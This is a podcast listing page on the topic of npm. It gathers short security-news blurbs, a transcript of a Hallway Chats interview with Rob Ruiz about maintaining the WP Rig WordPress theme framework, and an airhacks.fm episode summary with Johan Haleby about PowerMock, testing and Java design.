Podcasts about NPM

n8n supply chain attack Malicious npm pagackages were used to attempt to obtain user OAUTH credentials for NPM. https://www.endorlabs.com/learn/n8mare-on-auth-street-supply-chain-attack-targets-n8n-ecosystem Gogs 0-Day Exploited in the Wild An at the time unpachted flaw in Gogs was exploited to compromise git repos. https://www.wiz.io/blog/wiz-research-gogs-cve-2025-8110-rce-exploit Telegram Proxy Link Abuse Telegram proxy links have been abused to deanonymize users https://x.com/GangExposed_RU/status/2009961417781457129

Introducing Rob Ruiz Meet Rob Ruiz, a seasoned Senior Full Stack Developer with nearly two decades of expertise in WordPress innovation and open-source magic. As the Lead Maintainer of WP Rig since 2020, Rob has been the driving force behind this groundbreaking open-source framework that empowers developers to craft high-performance, accessible, and progressively enhanced WordPress themes with ease. WP Rig isn’t just a starter theme—it’s a turbocharged toolkit that bundles modern build processes, linting, optimization, and testing to deliver lightning-fast, standards-compliant sites that shine on any device. Show Notes For more on Rob and WP Rig, check out these links: LinkedIn Profile: https://www.linkedin.com/in/robcruiz WP Rig Official Site: https://wprig.io GitHub Repository: https://github.com/wprig/wprig Latest Releases: https://github.com/wprig/wprig/releases WP Rig 3.1 Announcement: https://wprig.io/wp-rig-3-1/ Transcript: Topher DeRosia: Hey everybody. Welcome to Hallway Chats. I’m your host Topher DeRosia, and with me today I have- Rob Ruiz: Rob Ruiz. Topher: Rob. You and I have talked a couple of times, once recently, and I learned about a project you’re working on, but not a whole lot about you. Where do you live? What do you do for a living? Rob: Yeah, for sure. Good question. Although I’m originally from Orlando, Florida, I’ve been living in Omaha, Nebraska for a couple of decades now. So I’m pretty much a native. I know a lot of people around here and I’ve been fairly involved in various local communities over the years. I’m a web developer. Started off as a graphic designer kind of out of college, and then got interested in web stuff. And so as a graphic designer turned future web developer, I guess, I was very interested in content management systems because it made the creating and managing of websites very, very easy. My first couple of sites were Flash websites, sites with macro media Flash. Then once I found content management systems, I was like, “Wow, this is way easier than coding the whole thing from scratch with Flash.” And then all the other obvious benefits that come from that. So I originally started with Joomla, interestingly enough, and used Joomla for about two or three years, then found WordPress and never looked back. And so I’ve been using WordPress ever since. As the years have gone on, WordPress has enabled me to slowly transition from a more kind of web designer, I guess, to a very full-blown web developer and software engineer, and even software architect to some degree. So here we are many years later. Topher: There’s a big step from designer to developer. How did that go for you? I’m assuming you went to PHP. Although if you were doing Flash sites, you probably learned ActionScript. Rob: Yeah. Yeah. That was very convenient when I started learning JavaScript. It made it very easy to learn JavaScript faster because I already had a familiarity with ActionScript. So there’s a lot of similarities there. But yeah. Even before I started doing PHP, I started learning more HTML and CSS. I did do a couple of static websites between there that were just like no content management system at all. So I was able to kind of sharpen my sword there with the CSS and HTML, which wasn’t particularly hard. But yeah, definitely, the PHP… that was a big step was PHP because it’s a proper logical programming language. There was a lot there I needed to unpack, and so it took me a while. I had to stick to it and really rinse and repeat before I finally got my feet under me. Topher: I can imagine. All right. So then you work for yourself or you freelance or do you have a real job, as it were? Rob: Currently, I do have a real job. Currently, I’m working at a company called Bold Orange out of Minneapolis. They’re a web agency. But I kind of bounce around from a lot of different jobs. And then, yes, I do freelance on the side, and I also develop my own products as well for myself and my company. Topher: Cool. Bold Orange sounds familiar. Who owns that? Rob: To be honest, I don’t know who the owners are. It’s just a pretty big web agency out of Minneapolis. They are a big company. You could just look them up at boldorange.com. They work for some pretty big companies. Topher: Cool. All right. You and I talked last about WP Rig. Give me a little background on where that came from and how you got it. Rob: Yeah, for sure. Well, there was a period of time where I was working at a company called Proxy Bid that is in the auction industry, and they had a product or a service — I don’t know how you want to look at that —called Auction Services. That product is basically just building WordPress sites for auction companies. They tasked us with a way to kind of standardize those websites essentially. And what we realized is that picking a different theme for every single site made things difficult to manage and increase tech debt by a lot. So what we were tasked with was, okay, if we’re going to build our own theme that we’re just going to make highly dynamic so we can make it look different from site to site. So we want to build it, but we want to build it smart and we want to make it reusable and maintainable. So let’s find a good framework to build this on so that we can maintain coding standards and end up with as little tech debt as possible, essentially. That’s when I first discovered WP Rig. In my research, I came across it and others. We came across Roots Sage and some of the other big names, I guess. It was actually a team exercise. We all went out and looked for different ones and studied different ones and mine that I found was WP Rig. And I was extremely interested in that one over the other ones. Interestingly enough- Topher: Can you tell me why over the other ones? Rob: That’s a great question. Yeah. I really liked the design patterns. I really liked the focus on WordPress coding standards. So having a system built in that checked all the code against WordPress coding standards was cool. I loved the compiling transpiling, whatever, for CSS and JavaScript kind of built in. That sounded really, really interesting. The fact that there was PHP unit testing built into it. So there’s like a starter testing framework built in that’s easy to extend so that you can add additional unit tests as your theme grows. We really wanted to make sure… because we were very into CICD pipelines. So we wanted to make sure that as developers were adding or contributing to any themes that we built with this, that we could have automated tests run and automated builds run, and just automate as much as possible. So WP rig just seemed like something that gave us those capabilities right out of the box. So that was a big thing. And I loved the way that they did it. Roots Sage does something similar, but they use their blade templating engine built in there. We really wanted to stick to something that was a bit more standard WordPress so that there wasn’t like a large knowledge overhead so that we didn’t have to say like, okay, if we’re bringing on other developers, like junior developers work on it, oh, it would be nice if you use Laravel too because we use this templating engine in all of our themes. We didn’t want to have to worry about that essentially. It was all object-oriented and all that stuff too. That’s what looked interesting to me. We ended up building a theme with WP Rig. I don’t know what they ended up doing with it after that, because I ended up getting let go shortly thereafter because the company had recently been acquired. Also, this was right after COVID too. So there was just a lot of moving parts and changing things at the time. So I ended up getting let go. But literally a week after I got let go, I came across a post on WP Tavern about how this framework was looking for new maintainers. Basically, this was a call put out by Morton, the original author of WP Rig. He reached out to WP Tavern and said, “Look, we’re not interested in maintaining this thing anymore, but it’s pretty cool. We like what we’ve built. And so we’re looking for other people to come in and adopt it essentially.” So I joined a Zoom meeting with a handful of other individuals that were also interested in this whole endeavor, and Morton reached out to me after the call and basically just said, “I looked you up. I liked some of the input that you had during the meeting. Let’s talk a little bit more.” And then that eventually led to conversations about me essentially taking the whole project over entirely. So, the branding, the hosting of the website, being lead maintainer on the project. Basically, gave me the keys to the kingdom in terms of GitHub and everything. So that’s how it ended up going in terms of the handoff between Morton and I. And I’m very grateful to him. They really created something super cool and I was honored to take it over and kind of, I don’t know, keep it going, I guess. Topher: I would be really curious. I don’t think either of us have the answer. I’d be curious to know how similar that path is to other project handoffs. It’s different from like an acquisition. You didn’t buy a plugin from somebody. It was kind of like vibes, I guess. Rob: It was like vibes. It was very vibey. I guess that’s probably the case in an open source situation. It’s very much an open source project. It’s a community-driven thing. It’s for everybody by everybody. I don’t know if all open source community projects roll like that, but that’s how this one worked out. There was some amount of ownership on Morton’s behalf. He did hire somebody to do the branding for WP Rig and the logo. And then obviously he was paying for stuff like the WPrig.io domain and the hosting through SiteGround and so on and so forth. So, we did have to transfer some of that and I’ve taken over those, I guess, financial burdens, if you want to think of it like that. But I’m totally okay with it. Topher: All right. You sort of mentioned some of the things Rig does, compiling and all that kind of stuff. Can you tell me… we didn’t discuss this before. I’m sitting at my desk and I think I want a website. How long does it take to go from that to looking at WordPress and logging into the admin with Rig? Rob: Okay. Rig is not an environment management system like local- Topher: I’m realizing my mistake. Somebody sends me a design in Figma. How long does it take me to go from that to, I’m not going to say complete because I mean, that’s CSS, but you know, how long does it take me to get to the point where I’m looking at a theme that is mine for the client that I’m going to start converting? Rob: Well, if you’re just looking for a starting point, if you’re just like, okay, how long does it take to get to like, okay, here’s my blank slate and I’m ready to start adopting all of these rules that are set up in Figma or whatever, I mean, you’re looking at maybe 5 minutes, 10 minutes, something like that. It’s pretty automated. You just need some simple knowledge of Git. And then there are some prerequisites to using WP Rig. You do have to have composer installed because we do leverage some Composer packages to some of it, although to be honest, you could probably get away with not using Composer. You just have to be okay with sacrificing some of the tools the WP Rig assumes you’re going to have. And then obviously Node. You have to have Node installed. A lot of our documentation assumes that you have NPM, that you’re using NPM for all your Nodes or your package management. But we did recently introduce support for Bun. And so you can use Bun instead of NPM, which is actually a lot faster and better in many ways. Topher: Okay. A lot of my audience are not developers, users, or light developers, like they’ll download a theme, hack a template, whatever. Is this for them? Am I boring those people right now? Rob: That’s a great question. I mean, and I think this is an interesting dichotomy and paradigm in the WordPress ecosystem, because you’ve got kind of this great divide. At least this is something I’ve noticed in my years in the WordPress community is you have many people that are not coders or developers that are very interested in expanding their knowledge of WordPress, but it’s strictly from a more of a marketing perspective where it’s like, I just want to know how to build websites with WordPress and how to use it to achieve my goals online from a marketing standpoint. You have that group of people, and then you have this other group of people that are very developer centric that want to know how to extend WordPress and how to empower those other people that we just discussed. Right? Topher: Right. Rob: So, yeah, that’s a very good question. I would say that WP Rig is very much designed for the developers, not for the marketers. The assumption there is that you’re going to be doing some amount of coding. Now, can you get away with doing a very light amount of coding? Yes. Yes, you can. I mean, if you compare what you’re going to get out of that assumed workflow to something that you would get off like Theme Forest or whatever, it’s going to be a night and day difference because those theme, Forest Themes, have hours, hundreds, sometimes hundreds of hours of development put into them. So, you’re not going to just out of the box immediately get something that is comparable to that. Topher: You need to put in those hundreds of hours of development to make a theme. Rob: As of today, yes. That may change soon though. Topher: Watch this space. Rob: That’s all I’ll say. Topher: Okay. So now we know who it’s for. I’m assuming there’s a website for it. What is it? Rob: Yeah. If you go to WPrig.io, we have a homepage that shows you all the features that are there in WP Rig. And then there’s a whole documentation area that helps people get up and running with WP Rig because there is a small learning curve there that’s pretty palatable for anybody who’s familiar with modern development workflows. So that is a thing. So the type of person that this is designed for anybody that wants to make a theme for anything. Let’s say you’re a big agency and you pull in a big client and that client wants something extremely custom and they come to you with Figma designs. Sure, you could go out there and find some premium theme and try to like child theme and overhaul that if you want. But in many situations, I would say in most situations, if you’re working from a Figma design that’s not based off of another theme already that’s just kind of somebody else’s brainchild, then you’re probably going to want to start from scratch. And so the idea here is that this is something to replace an approach, like underscores an approach. Actually, WP Pig was based off of underscores. The whole concept of it, as Morton explained it to me, was that he wanted to build an underscores that was more modern and full-featured from a development standpoint. Topher: Does it have any opinions about Gutenberg? Rob: It does now, but it did not when I took it over because Gutenberg did not exist yet when I took over WP Rig. Topher: Okay. What are its opinions? Rob: Yeah, sure. The opinion right out of the gate is that you can use Gutenberg as an editor and it has support like CSS rules in it for the standard blocks. So you should be able to use regular Gutenberg blocks in your theme and they should look just fine. There’s no resets in there. It doesn’t start from scratch. There’s not a bunch of styling you have to do for the blocks necessarily. Now, if you go to the full site editing or block-based mentality here, there are some things you need to do in WP Rig to convert the out-of-the-box WP Rig into another paradigm essentially. Right when you pull WP Rig, the assumption is you’re building what most people would refer to as a hybrid theme. The theme supports API or whatever, and the assumption is that you’re not going to be using the site editor. You’re just going to kind of do traditional WordPress, but you might be using Gutenberg for your content. So you’re just using Gutenberg kind of to author your pages and your posts and stuff like that, but not necessarily the whole site. WP Rig has the ability to kind of transform itself into other paradigms. So the first paradigm we built out was the universal theme approach. And the idea there is that you get a combination of the full site editing capabilities. But then you also have the traditional menu manager and the settings customizer framework or whatever is still there, right? These are things that don’t exist in a standard block-based theme. So I guess an easy example would be like the 2025 WordPress theme that comes right out of the box. It comes installed in WordPress. That is a true block-based theme, not a universal theme. So it doesn’t have those features because the assumption there is that it doesn’t need those features. You can kind of transform WP Rig into a universal theme that’s kind of a hybrid between a block-based and a classic theme. And then it can also transform into a strictly block-based theme as well. So following the same architecture as like the WordPress 2025 theme or Ollie or something like that is also a true block-based theme as well. So you can easily convert or transform the starting point of WP Rig into either of those paradigms if that’s the type of theme you’re setting out to build. Topher: Okay. That sounds super flexible. How much work is it to do that? Rob: It’s like one command line. Previously we had some tutorials on the website that showed you step-by-step, like what you needed to change about the theme to do that. You would have to add some files, delete some files, edit some code, add some theme supports into the base support class and some other stuff. I have recently, as of like a year and a half ago or a year ago, created a command line or a command that you can type into the command line that basically does that entire conversion process for you in like the blink of an eye. It takes probably a second to a second and a half to perform those changes to the code and then you’re good to go. It is best to do that conversion before you start building out your whole theme. It’s not impossible to do it after. But you’re more likely to run into problems or conflicts if you’ve already set out building your whole theme under one paradigm, and then you decide how the project you want to switch over to block-based or whatever. You’re likely to run into the need to refactor a bunch of stuff in that situation. So it is ideal to make that choice extremely early on in the process of developing your theme. But either way it’ll still work. That’s just one of the many tools that exist in WP Rig to transform it or convert it in several ways. That’s just one example. There are other examples of ways that Rig kind of converts itself to other paradigms as well. Topher: Yeah. All right. In my development life, I’ve had two parts to it. And one is the weekend hobbyist, or I download cadence and I whip something up in 20 minutes because I just want to experiment and the other is agency life where everything’s in Git, things are compiled, there are versions, blah, blah, blah. This sounds very friendly to that more professional pathway. Rob: Absolutely. Yes. Or, I mean, there’s another situation here too. If you’re a company who develops themes and publishes them to a platform like ThemeForest or any other platform, perhaps you’re selling themes on your own website, whatever, if you’re making things for sale, there’s no reason you couldn’t use WP Rig to build your themes. We have a bundle process that bundles your theme for publication or publishing. Whether you’re an agency or whether you’re putting your theme out for sale, it doesn’t matter, during that bundle process, it does actually white label the entire code base to where there’s no mention of WP Rig in the code whatsoever. Let’s say you were to build a theme that you wanted to put up for sale because you have some cool ideas. Say, page transitions now are completely supported in all modern or in most modern browsers. And when I say print page transitions, for those that are in the know, I am talking about not single page app page transitions, but through website page transitions. You can now do that. Let’s say you were like, “Hey, I’m feeling ambitious and I want to put out some new theme that comes with these page transitions built in,” and that’s going to be fancy on ThemeForest when people look at my demo, people might want to buy that. You could totally use WP Rig to build that out into a theme and the bundle process will white label all of the code. And then when people buy your theme and download that code, if they’re starting to go through and look through your code, they’re not going to have any way of knowing that it was built with WP Rig unless they’re familiar with the base WP Rig architecture, like how it does its object-oriented programming. It might be familiar with the patterns that it’s using and be able to kind of discern like, okay, well, this is the same pattern WP Rig uses, so high likelihood it was built with WP Rig. But they’re not going to be able to know by reading through the code. It’s not going to say WP Rig everywhere. It’s going to have the theme all over the place in the code. Topher: Okay. So then is that still WP Rig code? It just changed its labels? Rob: Yeah. Topher: So, it’s not like you’re exporting HTML, CSS and JavaScript? The underlying Rig framework is still there. Rob: Yeah. During the bundle process, it is bundling CSS and HTML. Well, HTML in the case of a block-based theme. But, yeah, it is bundling your PHP, your CSS, your JavaScript into the theme that you’re going to let people download when they buy it, or that you’re going to ship to your whatever client’s website. But all that code is going to be transpiled. In the case of CSS and JavaScript, there’s only going to be minified versions of that code in that theme. The source code is not actually going to be in there. Topher: This sounds pretty cool. You mentioned some stuff might be coming. You don’t have to tell me what it is, but do you have a timeline? When should we be watching for the next cool thing from Rig? Rob: Okay, cool. Well, I’m going to keep iterating on Rig forever. Regardless of any future products that might be built on WP Rig, WP Rig will always and forever remain an open source product for anybody to use for free and we, I, and possibly others in the future will continue to update it and support it over time. We just recently put out 3.1. You could expect the 3.2 anytime in the next six months to a year, probably closer to six months. One feature I’m looking at particularly closely right now is the new stuff coming out in version 6.9 of WordPress around the various APIs that are there. I think one of them is called the form… There’s a field API and a form API or view API or something like that. So WP Rig comes with a React-based settings framework in it. So if you want your theme to have a bunch of settings in it to make it flexible for whoever buys your theme, you can use this settings framework to easily create a bunch of fields, and then that framework will automatically manage all your fields and store all the data from those fields and make it easy to retrieve the values of the input on those fields, without knowing any React at all. Now, if you know React, you can go in there and, you know, embellish what’s already there, but it takes a JSON approach. So if you just understand JSON, you can go in and change the JSON for the framework, and that will automatically add fields into the settings framework. So you don’t even have to know React to extend the settings page if you want. That will likely get an overhaul using these new APIs being introduced into Rig. Topher: All right. How often have you run into something where, “Oh, look, WordPress has a new feature, I need to rebuild my system”? Rob: Over the last four or five years, it’s happened a lot because, yeah, I mean, like I said, when I first took this thing over, Gutenberg had not even been introduced yet. So, you had the introduction of Gutenberg and blocks. That was one thing. Then this whole full site editing became a thing, which later became the site editor. So that became a whole thing. Then all these various APIs. I mean, it happens quite frequently. So I’ve been working to keep it modern and up to date over the past four years and it’s been an incredible learning experience. It not only keeps my WordPress knowledge extremely sharp, but I’ve also learned how various other toolkits are built. That’s been the interesting thing. From a development standpoint, there’s two challenges here. One of the challenges is staying modern on the WordPress side of things. For instance, WordPress coding standards came out with a version 3 and then a version 3.1 about two years ago. I had to update WP Rig to leverage those modern coding standards. So that’s one example is as WordPress changes, the code in WP Rig also needs to change. Or for instance, if new CSS standards change, right, new CSS properties come out, it is ideal for the base CSS in WP Rig, meaning the CSS that you get right out of the box with it, comes with some of these, for instance, CSS grid, Flexbox, stuff like that. If I was adopting a theme framework to build a theme on, I would expect some of that stuff to be in there. And those things were extremely new when I first took over WP Rig and were not all baked in there essentially. So I’ve had to add a lot of that over time. Now there’s another side to this, which is not just keeping up with WordPress and CSS and PHP, 8. whatever, yada yada yada. You’ve also got the toolkit. There are various node packages and composer packages of power WP Rig and the process in which it does the transpiling, the bundling, the automated manipulation of your code during various aspects of the usage of WP Rig is a whole nother set of challenges because now you have to learn concepts like, well, how do I write custom node scripts? Right? Like there were no WP CLI commands built into WP Rig when I first took it over. Now there’s a whole list. There’s a whole library of WP CLI commands that come in Rig right out of the gate. And so I’ve had to learn about that. So just various things that come with knowing how do you automate the process of converting code, that’s something that was completely foreign to me when I first took over WP Rig. That’s been another incredible learning experience is understanding like what’s the difference between Webpack and Gulp. I didn’t know, right? I would tell people I’m using Gulp and WP Rig and they would be like, “Well, why don’t you just use Webpack?” and I would say, “I don’t know. I don’t know what the difference is.” So over time I could figure out what are the differences? Why aren’t we using Webpack? And I’m glad I spent some time on that because it turns out Webpack is not the hottest thing anymore, so I just skipped right over all that. When I overhauled for version 3, we’re now not using Gulp anymore as of 3.1. We’re now using more of a Vite-like process, far more modern than Webpack and far better and faster and sleeker and lighter. I had to learn a bunch about what powers Vite. What is Vite doing under the hood that we might be able to also do in WP Rig, but do it in a WordPress way. Because Vite is a SaaS tool. If you’re building a SaaS, like React with a… we’re not a SaaS. I guess a spa is a better term to use here. If you’re building a single page application with React or view or belt or whatever, right, then knowing what Vite is and just using Vite right out of the box is perfect. But it doesn’t translate perfectly to WordPress land because WordPress has its own opinions. And so I did have to do some dissecting there and figure out what to keep and what to not keep to what to kind of set aside so that WordPress can keep doing what WordPress does the way WordPress likes to do it, but also improve on how we’re doing some of the compiling and transpiling and the manipulation of the code during these various. Topher: All right. I want to pivot a little bit to some personal-ish questions. Rob: Okay. Topher: This is a big project. I’m sure it takes up plenty of your time. How scalable is that in your life? Do you want to do this for the rest of your life? Rob: That’s a fantastic question. I don’t know about the rest of my life. I mean, I definitely want to do web development for the rest of my life because the web has, let’s be honest, it’s transformed everyone’s way of life, whether you’re a web developer or not. You know, the fact that we have the internet in our pocket now, you know, it has changed everything. Apps, everything. It’s all built on the web. So I certainly want to be involved in the web the rest of my life. Do I want to keep doing WordPress the rest of my life? I don’t know. Do I want to keep doing WP Rig the rest of my life? I don’t know. But I will say that you bring up a very interesting point, which is it does take up a lot of time and also trust in open source over the past four or five years I would argue has diminished a little bit as a result of various events that have occurred over the past two or three years. I mean, we could cite the whole WP Engine Matt Mullerwig thing. We can also cite what’s going on with Oracle and JavaScript. Well, I mean, there’s many examples of this. I mean, we can cite the whole thing that happened… I mean, there’s various packages out there that are used and developed and open source to anybody, and some of them are going on maintained and it’s causing security vulnerabilities and degradation and all this stuff. So it’s a very important point. One thing I started thinking about after considering that in relation to WP Rig was I noticed that there’s usually a for-profit arm of any of these frameworks that seems to extend the lifespan of it. Let’s just talk about React, for example, React is an open source JavaScript framework, but it’s used by Facebook and Facebook is extremely for-profit. So companies that are making infrastructural or architectural decisions, they will base their choice on whether or not to use a framework largely on how long they think this framework is going to remain relevant or valid or maintained, right? A large part of that is, well, is there a company making money off of this thing? Because if there is, the chances- Topher: They’re going to keep doing that. Rob: They’re going to keep doing it. It’s going to stay around. That’s good. I think that’s healthy. A lot of people that like open source and want everything to be free, they might look at something like that and say like, well, I don’t want you to make a paid version of it or there shouldn’t be a pro version. I think that’s a very short-sighted way of looking at that software and these innovations. I think a more experienced way of looking at it is if you want something to remain relevant and maintained for a long period of time, having a for-profit way in which it’s leveraged is a very good thing. I mean, let’s be real. Would WordPress still be what it is today if there wasn’t a wordpress.com or if WooCommerce wasn’t owned by Automattic or whatever, right? They’ll be on top. I mean, it’s obviously impossible to say, but my argument would be, probably not. I mean, look at what’s happened to the other content management systems out there. You know, Joomla Drupal. They don’t really have a flourishing, you know, paid pro service that goes with their thing that’s very popular, at least definitely not as popular as WordPress.com or WordPress VIP or some of these other things that exist out there. And so having something that’s making and generating money that can then contribute back into it the way Automattic has been doing with WordPress over these years has, in my opinion, been instrumental. I mean, people can talk smack about Gutenberg all they want, but let’s be real, it’s 2025, would you still feel that WordPress is an elegant solution if we were still working from the WYSIWYG and using the classic editor? And I know a lot of people are still using the classic editor and there’s classic for us, the fork and all that stuff. But I mean, that only makes sense in a very specific implementation of WordPress, a very specific paradigm. If you want to explore any of these other paradigms out there, that way of thinking about WordPress kind of falls apart pretty quickly. I, for one, am happy that Gutenberg exists. I’m very happy that Automattic continues. And I’m grateful, actually, that Automattic continues to contribute back into WordPress. And not just them, obviously there’s other companies, XWP, 10Up, all these other companies are also contributing as well. But I’m very grateful that this ecosystem exists and that there’s contribution going back in and it’s happening from companies that are making money with this. And I think that’s vital. All that to say that WP Rig may and likely will have paid products in the future that leverage WP Rig. So that’s not to say that WP Rig will eventually cost money. That’s just to say that eventually people can expect other products to come out in the future that will be built on WP Rig and incentivize the continued contributions back into WP Rig. The open source version of WP Rig. Topher: That’s cool. I think that’s wise. If you want anything to stay alive, you have to feed it. Rob: That’s right. Topher: I had some more questions but I had forgotten them because I got caught up in your answer. Rob: Oh, thank you. I’ll take that as a compliment. I mean, my answer was eloquent. But I’m happy to expand on anything, know you, WordPress related, me related, you know, whether it comes to the ecosystem in WordPress, the whole WordCamp meetup thing is very interesting. I led the WP Omaha meetup for many years here in Omaha, Nebraska and I also led the WordCamp, the organizing of WordCamp here in Omaha for several years as well. That whole community, the whole ecosystem, at least in America seems to have largely fallen apart. I don’t know if you want to talk about that at all. But yeah, I’m ready to dive into any topics. Topher: I’m going to have one more question and then we’re going to wrap up. And it was that you were talking about all the things you had to learn. I’m sure there were nights where you were looking at your computer thinking, “Oh man, I had it working, now I gotta go learn a new thing.” I would love for you to go back in time and blog all of that if you would. But given that you can’t, I would be interested in a blog moving forward, documenting what you’re learning, how you’re learning it and starting maybe with a post that’s summarizes all of that. Obviously, that’s up to you and how you want to spend your time, but I think it’d be really valuable to other people starting a project, picking up somebody else’s project to see what the roadmap might look like. You know what I mean? Rob: For sure. Well, I can briefly summarize what I’ve learned over the years and where I’m at today with how I do this kind of stuff. I will say that a lot of the improvements to WP Rig that have happened over the last year or two would not be possible without the advent of AI. Topher: Interesting. Rob: That’s a fancy way of saying that I have been by coding a lot of WP Rig lately. If you know how to use AI, it is extremely powerful and it can help you do many things very quickly that previously would have taken much longer or more manpower. So, yeah, perhaps if there was like five, six, seven people actively, excuse me, actively contributing to WP Rig, then this type of stuff would have been possible previously, but that’s not the case. There is one person, well, one main contributor to WP Rig today and you’re talking to them. There are a handful of other people that have been likely contributing to WP Rig over the versions and you can find their contributions in the change log file in WP Rig. But those contributions have been extremely light compared to what I’ve been doing. I wouldn’t be able to do any of it without AI. I have learned my ability to learn things extremely rapidly has ramped up tenfold since I started learning how to properly leverage LLMs and AI. So that’s not to say that like, you know, WP Rig, all the code is just being completely written by AI and I’m just like. make it better, enter, and then like WP Rig is better. I wish it was that easy. It’s certainly not that. But when I needed to start asking some of these vital questions that I really didn’t have anyone to turn to to help answer them, I was able to turn to AI. For instance, let’s go back to the Webpack versus Gulp situation. Although Gulp is no longer used in WP Rig, you know, it was used in WP Rig until very recently. So I had to understand like, what is this system, how does it work, how do I extend it and how do I update it and all these things, right? And why aren’t we using WebPack and you know, is there validity to this criticism behind you should use webpack instead of Gulp or whatever, right? I was able to use AI to ask these questions and be able to get extremely good answers out of it and give me the direction I needed to make some of these kind of higher level decisions on like architecturally where should WP Rig go? It was through these virtual conversations with LLMs that I was able to refine the direction of WP Rig in a direction that is both modern and forward-thinking and architecturally sound. I learned a tremendous amount from AI about the architecture, about the code, about all of it. My advice to anybody that wants to extend their skill set a little bit in the development side of things is to leverage this new thing that we have in a way that is as productive as possible for you. So that’s going to vary from person to person. But for me, if I’m on a flight or if I’m stuck somewhere for a while, like, let’s say I got to take my kid to practice or something and I’m stuck there for an hour and I got to find some way to kill my time 9 times out of 10, I’m on my laptop or on my phone having conversations with Grok or ChatGPT or Gemini or whatever. I am literally refining… I’m just sitting there asking it questions that are on my mind that I wish I could ask somebody who’s like 10 times more capable than me. It has been instrumental. WP Rig wouldn’t be where it is today if it wasn’t for that. I would just say to anybody, especially now that it’s all on apps and you don’t have to be on a browser anymore, adopt that way of thinking. You know, if you’re on your lunch break or whatever and you have an hour lunch break and you only take 15 minutes to eat, what could you be doing with those other 45 minutes? You could just jump on this magical thing that we have now and start probing it for questions. Like, Hey, here’s what I know. Here’s what I don’t know. Fill these knowledge gaps for me.” And it is extremely good at doing that. Topher: So my question was, can you blog this and your answer told me that there’s more there that I want to hear. That’s the stuff that should be in your book when you write your book. Rob: I’m flattered that you would be interested in reading anything that I write. So thank you. I’ve written stuff in the past and it hasn’t gotten a lot of attention. But I also don’t have any platforms to market it either. But yeah, no, I made some… I’m sorry. Topher: I think your experience is valuable far beyond Rig or WordPress. If you abstract it out of a particular project to say, you know, I did this with a project, I learned this this way, I think that would be super valuable. Rob: Well, I will say that recently at my current job, I was challenged to create an end to end testing framework with Playwright that would speed up how long it takes to test things and also prevent, you know, to make things fail earlier, essentially, to prevent broken things from ending up in the wild, right, and having to catch them the hard way. I didn’t know a lot about Playwright, but I do know how toolkits work now because of WP Rig. And I was able to successfully in a matter of, I don’t know, three days, put together a starter kit for a test framework that we’re already using at work to test any website that we create for any client. It can be extended and it can be hooked into any CI CD pipeline and it generates reports for you and it does a whole bunch of stuff. I was able to do this relatively quickly. This knowledge, yes, does come in handy in other situations. Will I end up developing other toolkits like WP Rig in the future for other things? I guess if I can give any advice to anybody listening out there, another piece of advice I would give people is, you know, especially if you’re a junior developer and you’re still learning or whatever, or you’re just a marketing person and just want to have more control over the functionality side of what you’re creating or more insight into that so you could better, you know, manage projects or whatever. My advice would be to take on a small little project that is scoped relatively small that’s not too much for you to chew and go build something and do it with… Just doing that will be good. But if you can do it with the intent to then present it in some fashion, whether it be a blog article or creating a YouTube video or going to a meetup and giving a talk on it or even a lunch and learn at work or whatever, right, that will, in my experience, it will dramatically amplify how much you learn from that little pet project that’s kind of like a mini learning experience. And I highly encourage anybody out there to do that on the regular. Actually, no matter what your experience level is in development, I think you should do these things on a regular basis. Topher: All right. I’m going to wrap this up. I got to get back to work. You probably have to get back to work. Rob: Yeah. Topher: Thanks for talking. Rob: Thanks for having me, Topher. Really appreciate it. Topher: Where could people find you? WPrig.io?  Rob: Yeah, WPrig.io. WP rig has accounts on all of the major platforms and, even on Bluesky and Mastodon. You can look me up, Rob Ruiz. You can find me on LinkedIn. You can find me on all of those same platforms as well. You can add me on Facebook if you want, whatever. And I’m also in the WordPress Slack as well as Rob Ruiz. You can find me in the WordPress Slack. And then I’m on the WordPress Reddit and all that stuff. So yeah, reach out. If anybody wants to have any questions about Rig or anything else, I’m happy to engage.  Topher: Sounds good. All right, I’ll see you. Rob: All right, thanks, Topher. Have a good day. Topher: This has been an episode of the Hallway Chats podcast. I’m your host Topher DeRosia. Many thanks to our sponsor Nexcess. If you’d like to hear more Hallway Chats, please let us know on hallwaychats.com.

An airhacks.fm conversation with Johan Haleby (@johanhaleby) about: first computer experience with Commodore C64 and typing Basic programs from instruction manuals, early gaming experiences and interest in understanding load commands, transition to Amiga 500 Plus for demo scene scripting and composition, moving to PC era with 486 SX25 and four megabytes of RAM, learning Turbo Pascal and creating 2D Super Mario-inspired games, experimenting with inline assembler in Pascal and reading "The Art of Assembly Programming", reverse engineering games using Win32 disassembler to bypass license checks, studying computer science at Blekinge and Lund University in Sweden, first job at JayWay consultancy firm working on IKEA project in 2005, early adoption of Spring framework and automated testing practices, comparison of old-style EJB with heavy XML configuration versus Spring's lightweight approach, the evolution from XML-based configuration to annotation-based Java EE 5 and 6, creating PowerMock with colleague Jan Kronqvist to mock static methods and final classes, using asm and JavaAssist for bytecode manipulation instead of AspectJ, implementing custom class loaders where each JUnit method executed in different class loader, deep clone module for cloning object graphs between class loaders, tight coupling challenges between PowerMock and Mockito/EasyMock/JUnit versions, transition from EasyMock's record-replay pattern to Mockito's when-then approach, modern preference for avoiding mocks and testing against real cloud environments, optimizing for fast CI/CD pipelines rather than local simulation, structuring code to separate infrastructure concerns from pure business logic, using Java Records as pure data carriers versus adding behavior to records, Clojure-inspired philosophy of decoupling state from behavior and identity, Rich Hickey's "Simple Made Easy" talk and definitions of simple versus easy, multi-methods in functional languages as alternative to polymorphism, domain modeling example with network devices and fiber channel connections, benefits of object-oriented polymorphism for transparent persistence and simple code, avoiding religious adherence to patterns in favor of pragmatic solutions, Maven's stability and opinionated approach versus Gradle's flexibility, reducing external dependencies and Maven plugins in favor of CI/CD automation, the NPM ecosystem's over-modularization compared to Java's more reasonable approach, decline of OSGi hype and return to simpler monolithic architectures, Johan's current work on Occurrent Event Sourcing library and cloud events Johan Haleby on twitter: @johanhaleby

